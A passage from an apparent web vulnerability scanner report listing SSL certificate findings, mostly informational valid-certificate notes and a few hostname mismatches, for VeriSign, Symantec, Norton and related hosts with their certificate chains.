Valid from:	Mon Jul 05 18:00:00 GMT-06:00 2010
Valid to:	Thu Jul 05 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:	VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Wed Aug 02 17:59:59 GMT-06:00 2028

8.8. https://ssl-certificate-center.verisign.com/ previous next

Summary

Severity:	Medium
Confidence:	Certain
Host:	https://ssl-certificate-center.verisign.com
Path:	/

Issue detail

The following problem was identified with the server's SSL certificate:

The server's certificate is not valid for the server's hostname.

The server presented the following certificates:

Server certificate

Issued to:	ssl-certificate-center-ncsa.verisign.net
Issued by:	VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:	Mon Jul 05 18:00:00 GMT-06:00 2010
Valid to:	Thu Jul 05 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:	VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Wed Aug 02 17:59:59 GMT-06:00 2028

8.9. https://trust-center.verisign.ch/ previous next

Summary

Severity:	Medium
Confidence:	Certain
Host:	https://trust-center.verisign.ch
Path:	/

Issue detail

The following problem was identified with the server's SSL certificate:

The server's certificate is not valid for the server's hostname.

The server presented the following certificates:

Server certificate

Issued to:	ssl-certificate-center-emea.verisign.net
Issued by:	VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:	Mon Jul 05 18:00:00 GMT-06:00 2010
Valid to:	Thu Jul 05 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:	VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Wed Aug 02 17:59:59 GMT-06:00 2028

8.10. https://trust-center.verisign.com/ previous next

Summary

Severity:	Medium
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/

Issue detail

The following problem was identified with the server's SSL certificate:

The server's certificate is not valid for the server's hostname.

The server presented the following certificates:

Server certificate

Issued to:	ssl-certificate-center-ncsa.verisign.net
Issued by:	VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:	Mon Jul 05 18:00:00 GMT-06:00 2010
Valid to:	Thu Jul 05 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:	VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Wed Aug 02 17:59:59 GMT-06:00 2028

8.11. https://us.norton.com/ previous next

Summary

Severity:	Medium
Confidence:	Certain
Host:	https://us.norton.com
Path:	/

Issue detail

The following problem was identified with the server's SSL certificate:

The server's certificate is not valid for the server's hostname.

The server presented the following certificates:

Server certificate

Issued to:	www.norton.com
Issued by:	USERTrust Legacy Secure Server CA
Valid from:	Thu Jul 07 18:00:00 GMT-06:00 2011
Valid to:	Sat May 19 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:	USERTrust Legacy Secure Server CA
Issued by:	Entrust.net Secure Server Certification Authority
Valid from:	Thu Nov 26 14:33:13 GMT-06:00 2009
Valid to:	Sat Oct 31 22:00:00 GMT-06:00 2015

Certificate chain #2

Issued to:	Entrust.net Secure Server Certification Authority
Issued by:	Entrust.net Secure Server Certification Authority
Valid from:	Tue May 25 10:09:40 GMT-06:00 1999
Valid to:	Sat May 25 10:39:40 GMT-06:00 2019

8.12. https://admin.instantservice.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.instantservice.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	*.instantservice.com
Issued by:	VeriSign Class 3 Secure Server CA - G3
Valid from:	Wed Jul 06 18:00:00 GMT-06:00 2011
Valid to:	Fri Jul 06 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:	VeriSign Class 3 Secure Server CA - G3
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Sun Feb 07 18:00:00 GMT-06:00 2010
Valid to:	Fri Feb 07 17:59:59 GMT-06:00 2020

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Wed Aug 02 17:59:59 GMT-06:00 2028

8.13. https://buy-static.norton.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://buy-static.norton.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	buy-static.norton.com
Issued by:	VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:	Mon Jul 11 18:00:00 GMT-06:00 2011
Valid to:	Sat Jul 28 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:	VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Wed Aug 02 17:59:59 GMT-06:00 2028

8.14. https://cdn.verisign.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://cdn.verisign.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	cdn.verisign.com
Issued by:	www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Valid from:	Sun Apr 18 18:00:00 GMT-06:00 2010
Valid to:	Fri Apr 18 17:59:59 GMT-06:00 2014

Certificate chain #1

Issued to:	www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Wed Apr 16 18:00:00 GMT-06:00 1997
Valid to:	Mon Oct 24 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Wed Aug 02 17:59:59 GMT-06:00 2028

8.15. https://cert.webtrust.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://cert.webtrust.org
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	cert.webtrust.org
Issued by:	www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Valid from:	Wed Oct 21 18:00:00 GMT-06:00 2009
Valid to:	Sun Oct 21 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:	www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Wed Apr 16 18:00:00 GMT-06:00 1997
Valid to:	Mon Oct 24 17:59:59 GMT-06:00 2011

Certificate chain #2

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Wed Aug 02 17:59:59 GMT-06:00 2028

8.16. https://donate.mozilla.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://donate.mozilla.org
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	donate.mozilla.org
Issued by:	UTN-USERFirst-Hardware
Valid from:	Mon Sep 20 18:00:00 GMT-06:00 2010
Valid to:	Wed Sep 21 17:59:59 GMT-06:00 2011

Certificate chain #1

Issued to:	UTN-USERFirst-Hardware
Issued by:	UTN-USERFirst-Hardware
Valid from:	Fri Jul 09 12:10:42 GMT-06:00 1999
Valid to:	Tue Jul 09 12:19:22 GMT-06:00 2019

8.17. https://drh.img.digitalriver.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://drh.img.digitalriver.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	*.img.digitalriver.com,ST=Minnesota
Issued by:	Akamai Subordinate CA 3
Valid from:	Thu Feb 03 08:22:35 GMT-06:00 2011
Valid to:	Fri Feb 03 08:22:35 GMT-06:00 2012

Certificate chain #1

Issued to:	Akamai Subordinate CA 3
Issued by:	GTE CyberTrust Global Root
Valid from:	Thu May 11 09:32:00 GMT-06:00 2006
Valid to:	Sat May 11 17:59:00 GMT-06:00 2013

Certificate chain #2

Issued to:	GTE CyberTrust Global Root
Issued by:	GTE CyberTrust Global Root
Valid from:	Wed Aug 12 18:29:00 GMT-06:00 1998
Valid to:	Mon Aug 13 17:59:00 GMT-06:00 2018

8.18. https://enterprise-ssl-admin.verisign.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprise-ssl-admin.verisign.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	enterprise-ssl-admin.verisign.com
Issued by:	VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:	Thu Oct 22 18:00:00 GMT-06:00 2009
Valid to:	Thu Oct 13 17:59:59 GMT-06:00 2011

Certificate chain #1

Issued to:	VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Tue Aug 01 17:59:59 GMT-06:00 2028

Certificate chain #4

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Wed Aug 02 17:59:59 GMT-06:00 2028

8.19. https://idprotect.verisign.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://idprotect.verisign.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	idprotect.verisign.com
Issued by:	VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:	Wed Mar 24 18:00:00 GMT-06:00 2010
Valid to:	Sat Mar 24 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:	VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Wed Aug 02 17:59:59 GMT-06:00 2028

8.20. https://partnernet.symantec.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://partnernet.symantec.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	partnernet.symantec.com
Issued by:	VeriSign Class 3 International Server CA - G3
Valid from:	Thu Dec 16 18:00:00 GMT-06:00 2010
Valid to:	Sun Jan 08 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:	VeriSign Class 3 International Server CA - G3
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Sun Feb 07 18:00:00 GMT-06:00 2010
Valid to:	Fri Feb 07 17:59:59 GMT-06:00 2020

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Wed Aug 02 17:59:59 GMT-06:00 2028

8.21. https://policy3.responsys.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://policy3.responsys.net
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	*.responsys.net
Issued by:	Equifax Secure Certificate Authority
Valid from:	Sun May 16 05:02:14 GMT-06:00 2010
Valid to:	Sun Jun 17 14:48:31 GMT-06:00 2012

Certificate chain #1

Issued to:	Equifax Secure Certificate Authority
Issued by:	Equifax Secure Certificate Authority
Valid from:	Sat Aug 22 10:41:51 GMT-06:00 1998
Valid to:	Wed Aug 22 10:41:51 GMT-06:00 2018

8.22. https://press.verisign.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://press.verisign.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	press.verisign.com
Issued by:	VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:	Tue Mar 02 18:00:00 GMT-06:00 2010
Valid to:	Fri Mar 02 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:	VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Wed Aug 02 17:59:59 GMT-06:00 2028

8.23. https://products.geotrust.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://products.geotrust.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	products.geotrust.com
Issued by:	GeoTrust Extended Validation SSL CA
Valid from:	Sat Apr 16 15:58:45 GMT-06:00 2011
Valid to:	Sat May 18 12:50:47 GMT-06:00 2013

Certificate chain #1

Issued to:	GeoTrust Extended Validation SSL CA
Issued by:	GeoTrust Primary Certification Authority
Valid from:	Tue Nov 28 18:00:00 GMT-06:00 2006
Valid to:	Mon Nov 28 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:	GeoTrust Primary Certification Authority
Issued by:	Equifax Secure Certificate Authority
Valid from:	Tue Nov 28 10:08:31 GMT-06:00 2006
Valid to:	Tue Aug 21 09:08:31 GMT-06:00 2018

Certificate chain #3

Issued to:	Equifax Secure Certificate Authority
Issued by:	Equifax Secure Certificate Authority
Valid from:	Sat Aug 22 10:41:51 GMT-06:00 1998
Valid to:	Wed Aug 22 10:41:51 GMT-06:00 2018

Certificate chain #4

Issued to:	Equifax Secure Certificate Authority
Issued by:	Equifax Secure Certificate Authority
Valid from:	Sat Aug 22 10:41:51 GMT-06:00 1998
Valid to:	Wed Aug 22 10:41:51 GMT-06:00 2018

8.24. https://products.verisign.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://products.verisign.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	products.verisign.com
Issued by:	VeriSign Class 3 Extended Validation SSL CA
Valid from:	Wed Nov 18 18:00:00 GMT-06:00 2009
Valid to:	Wed Nov 30 17:59:59 GMT-06:00 2011

Certificate chain #1

Issued to:	VeriSign Class 3 Extended Validation SSL CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Tue Aug 01 17:59:59 GMT-06:00 2028

Certificate chain #4

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Wed Aug 02 17:59:59 GMT-06:00 2028

8.25. https://renewals.symantec.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://renewals.symantec.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	renewals.symantec.com
Issued by:	VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:	Mon Apr 25 18:00:00 GMT-06:00 2011
Valid to:	Wed Apr 25 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:	VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Tue Aug 01 17:59:59 GMT-06:00 2028

Certificate chain #4

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Wed Aug 02 17:59:59 GMT-06:00 2028

8.26. https://seal.verisign.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://seal.verisign.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	seal.verisign.com
Issued by:	VeriSign Class 3 Secure Server CA - G2
Valid from:	Tue Jul 06 18:00:00 GMT-06:00 2010
Valid to:	Sun Jul 06 17:59:59 GMT-06:00 2014

Certificate chain #1

Issued to:	VeriSign Class 3 Secure Server CA - G2
Issued by:	VeriSign Trust Network
Valid from:	Tue Mar 24 18:00:00 GMT-06:00 2009
Valid to:	Sun Mar 24 17:59:59 GMT-06:00 2019

Certificate chain #2

Issued to:	VeriSign Trust Network
Issued by:	VeriSign Trust Network
Valid from:	Sun May 17 18:00:00 GMT-06:00 1998
Valid to:	Tue Aug 01 17:59:59 GMT-06:00 2028

Certificate chain #3

Issued to:	VeriSign Trust Network
Issued by:	VeriSign Trust Network
Valid from:	Sun May 17 18:00:00 GMT-06:00 1998
Valid to:	Tue Aug 01 17:59:59 GMT-06:00 2028

8.27. https://securitycenter.verisign.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://securitycenter.verisign.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	SECURITYCENTER.VERISIGN.COM
Issued by:	VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:	Mon Dec 27 18:00:00 GMT-06:00 2010
Valid to:	Thu Dec 27 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:	VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Wed Aug 02 17:59:59 GMT-06:00 2028

8.28. https://symaccount.symantec.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://symaccount.symantec.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	symaccount.symantec.com
Issued by:	VeriSign Class 3 International Server CA - G3
Valid from:	Thu Feb 10 18:00:00 GMT-06:00 2011
Valid to:	Thu Mar 01 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:	VeriSign Class 3 International Server CA - G3
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Sun Feb 07 18:00:00 GMT-06:00 2010
Valid to:	Fri Feb 07 17:59:59 GMT-06:00 2020

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Wed Aug 02 17:59:59 GMT-06:00 2028

8.29. https://symantec-corporation.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://symantec-corporation.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	symantec-corporation.com
Issued by:	VeriSign Class 3 International Server CA - G3
Valid from:	Mon May 16 18:00:00 GMT-06:00 2011
Valid to:	Wed May 16 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:	VeriSign Class 3 International Server CA - G3
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Sun Feb 07 18:00:00 GMT-06:00 2010
Valid to:	Fri Feb 07 17:59:59 GMT-06:00 2020

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Wed Aug 02 17:59:59 GMT-06:00 2028

8.30. https://test-products.verisign.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://test-products.verisign.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	test-products.verisign.com
Issued by:	VeriSign Class 3 Extended Validation SSL CA
Valid from:	Sun Nov 07 18:00:00 GMT-06:00 2010
Valid to:	Wed Nov 07 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:	VeriSign Class 3 Extended Validation SSL CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Wed Aug 02 17:59:59 GMT-06:00 2028

Certificate chain #4

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Wed Aug 02 17:59:59 GMT-06:00 2028

8.31. https://vipdeveloper.verisign.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://vipdeveloper.verisign.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	vipdeveloper.verisign.com
Issued by:	VeriSign Class 3 Extended Validation SSL CA
Valid from:	Wed Mar 17 18:00:00 GMT-06:00 2010
Valid to:	Sat Mar 17 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:	VeriSign Class 3 Extended Validation SSL CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Wed Aug 02 17:59:59 GMT-06:00 2028

8.32. https://vipmanager.verisign.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://vipmanager.verisign.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	vipmanager.verisign.com
Issued by:	VeriSign Class 3 Extended Validation SSL CA
Valid from:	Sun Mar 07 18:00:00 GMT-06:00 2010
Valid to:	Sat Mar 24 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:	VeriSign Class 3 Extended Validation SSL CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
